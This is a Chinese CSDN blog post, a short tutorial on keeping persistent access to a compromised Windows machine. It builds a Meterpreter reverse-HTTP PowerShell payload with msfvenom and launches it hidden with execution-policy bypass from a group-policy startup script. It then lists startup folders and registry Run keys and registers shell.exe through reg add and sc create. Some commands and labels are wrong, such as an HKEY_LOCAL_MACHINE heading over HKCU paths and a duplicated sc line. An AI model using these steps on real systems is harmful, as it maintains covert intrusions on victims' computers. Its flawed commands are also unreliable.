windows系统维权

最新推荐文章于 2024-06-14 13:37:46 发布
最新推荐文章于 2024-06-14 13:37:46 发布
阅读量105 收藏
点赞数
文章标签: 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45711054/article/details/132680966
版权

1、组策略开机启动脚本:生成一个powershell的木马:msfvenom -p windows/x64/meterpreter/reverse_http lhost=192.168.52.130 lport=3333 -f psh -o shell.ps1

@echo off
powershell.exe ­-w hidden ­-ExecutionPolicy Bypass ­-NoExit ­-File C:\Users\Administart\Desktop\shell.ps1
exit


2、启动文件夹 里面的文件可以会在开机的时候自动启动。通过开始菜单——所有程序——启动 这个文件夹内,可以将程序开机自动启动
启动文件夹:
C: \ProgramData\Microsoft\Windows\Start Menu\Programs\Startup #系统级,需要system权限
C: \Users\用户名\AppData\Roaming\Microsoft\Windows\Start\Menu\Programs\Startup #用户级普通权限

组策略脚本启动文件夹:
C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup
C:\Windows\System32\GroupPolicy\Machine\Scripts\Shutdown
C:\Windows\System32\GroupPolicy\User\Scripts\Logon
C:\Windows\System32\GroupPolicy\User\Scripts\Logoff


3、注册表
以下注册表路径都是注册表的启动项:
# HKEY_LOCAL_MACHINE类
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
# HKEY_CURRENT_USER类
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

使用reg add命令进行添加:
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v shell /t REG_SZ /d "C:\Users\Administart\Desktop\shell.exe"

重启win10机器,靶机上线

创建服务的方式:

sc create "test" binpath= "C:\Users\Administart\Desktop\shell.exe"    #创建服务
sc description "test" "test"        #设置服务的描述字符串
sc description "test" "test"           #设置这个服务为自动启动
net start "test"                       #启动服务


services.msc    #查看服务是否已经创建

夜雨清城丶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Windows权限维持
qq_40012781的博客
07-03 392
Windows权限维持
使用msfconsole拿到win2008 R2的shell并进行维权二(权限维持)
X_xsj6的博客
08-11 484
使用msfconsole拿到win2008 R2的shell并进行维权二(权限维持) 四、维权后门 4.1查询服务器信息 4.1.1查看当前用户以及权限 4.1.2查看当前已有用户 4.1.3查看当前计算机名 4.2权限维护: 4.2.1创建账户(创建新用户的密码必须符合密码复杂度) 4.2.2将新建账户加入到管理员组 4.2.3开启靶机远程桌面功能 reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\...
windows环境变量滥用维权/提权
qq_50854662的博客
09-14 325
windows环境变量滥用维权/提权
Windows系统利用5次shift维权漏洞复现
热门推荐
wangyuxiang946的博客
07-26 1万+
操作系统: Windows 7 旗舰版 工具: kali系统的msfconsole 5次shift维权原理 Windows系统中,5次shift键可以触发粘滞键,也就是C:\Windows\System32\sethc.exe,我们将cmd.exe改成sethc.exe并替换掉原来的粘滞键,就可以在登录界面通过5次shift键执行cmd,并且是system权限 除此以外,还可以使用其他工具替换sethc.exe 第一步,使用kali的msfconsole生成木马工具 1.开启MSF
Windows系统利用5次shift维权漏洞复现_连续按5次shift kali
2401_83974345的博客
04-18 301
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。将生成的木马工具上传到目标主机的c:/windows/system32目录下,并替换原有的sethc.exe。1.在目标主机按5次shift触发sethc.exe,没有任何反应,因为程序被替换了。2.查看kali的监听状态,输入 shell 可进入目标主机的命令行,并执行系统命令。2.设置反弹shell的位置( 自己的ip )因篇幅有限,仅展示部分资料。
关于我个人对Windows系统还是苹果系统那个更好的看法
qq_40183816的博客
04-22 2206
我觉得在系统方面Windows 我更加青睐,以下有多个观点我之列其中最重要的。 1.兼容性 2.普遍性 3.高度集成性 当然中国太极画的好,事情拥有两面性,他的优点也是他缺点的所在。 1.兼容性 你可以让windows装在很多平台上,发挥它的性能,但你没办法,让黑苹果装在任意机型上,很多人可能会说,这不是废话吗?不,并不是 如果你让Mac系统也可以装在别的机型上那么他也将是下一个windows。 2.普遍性 我不说我见过的,会电脑的你说谁没用过Windows,足以窥见Windows 的广泛。 3.高度集成性
windows创建隐藏用户及后门
diaobusi的博客
06-20 2168
Windows操作系统中,用户系统是用于管理和控制用户访问、权限和资源的一组功能和机制。以下是Windows用户系统的一些关键概念和组成部分:用户账户:Windows用户系统基于用户账户来管理用户访问和权限。每个用户都必须拥有一个唯一的用户账户,用户账户包含了用户的登录名和密码等信息。用户账户可以是本地账户(仅限于本地计算机)或域账户(属于域控制器管理的网络域)。
工商系统维权跟踪工作报告.docx
11-25
工商系统维权跟踪工作报告.docx
工会民主管理维权PPT模板下载
07-15
这是一套工会民主管理维权PPT模板,第一PPT模板网提供各类工会相关幻灯片模板免费下载; 关键词:动态PPT模板,工会管理PPT,工会维权PPT,红色PowerPoint模板免费下载,.PPTX格式;
聚焦315消费者维权知识讲座.pptx
03-06
聚焦315消费者维权知识讲座.pptx
知识产权系统执法维权专项行动实施方案.pdf
11-13
...
2022最新全新开发悬赏任务网赚系统手机APP源码带后台管理
04-11
置顶推荐,排行榜,红包大厅,红包抽奖,任务步骤,举报维权,vip会员特权等众多功能。。。 源码内有教程,本人亲测可用 以下两点源码里没有教程 我就在这里发出来了 运行目录选择:pubic 伪静态选择:thinkPHP ...
nc网络收发测试-tcp客户端\TCP服务器\UDP\UDP广播
06-14 295
nc网络收发测试-tcp客户端
百度网盘限速解决办法
生活在别处
06-13 3519
比如可以获取下载直链后,使用IDM(Internet Download Manager)对该直链进行多线程下载,但是并不会有实际速率提升效果,因为百度网盘在服务器端进行了限速,多线程的速率总和被限制在了100KB/s左右。(现在虽然是所谓玩游戏获得会员下载体验,实际上点击后会在百度网盘内打开一个web游戏,并不需要游玩游戏,直接等待会员下载体验时间结束即可关闭web游戏窗口)所以,客户端这些改动伎俩通通没有实际效果,即使在客户端显示无限速、显示会员体验,都只是自欺欺人而已。
ASP 应用程序
csbysj2020的博客
06-09 377
ASP(Active Server Pages)是一种由微软开发的服务器端脚本环境,用于动态网页的创建。ASP允许开发者使用多种脚本语言,如VBScript或JScript,来创建交互式的网页。这些网页可以与数据库交互,处理表单数据,以及执行其他服务器端任务。ASP应用程序通常运行在Windows服务器上,并需要IIS(Internet Information Services)作为其Web服务器
多进程并发服务器
dc爱傲雪和技术
06-12 235
3.子进程:完成通信,接受一个客户端连接,就创建一个子进程用于通信。要实现TCP通信服务器处理并发的任务,使用多线程或者多进程来解决。2.父进程负责等待并接受客户端的连接。
计算机网络(6) ICMP协议
最新发布
qq_42761215的博客
06-14 397
ICMP是网络通信中不可或缺的协议,虽然不传输用户数据,但在网络管理和诊断中起着重要作用。理解ICMP及其各种消息类型对于网络管理员和工程师来说是至关重要的,它有助于维护网络的正常运行和性能优化。
Linux C语言:函数的基本用法及传参
Liu1013216383的博客
06-12 808
在程序运行过程中,将实际参数的值或者地址传递给被调用函数的形式参数,从而在函数中完成对数据处理和返回的过程。在C语言当中,参数的传递方式本质上只有一种,就是值传递。但为了更好区分理解,划分了三种方式。
getshell之后如何维权
04-30
如果您的网站被黑客攻击成功并且被入侵,您应该立即采取以下措施: 1. 立即停止服务器的所有服务,以防黑客继续攻击您的网站或服务器。...同时,您也可以通过法律途径维权,例如起诉黑客攻击您的网站并索赔。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值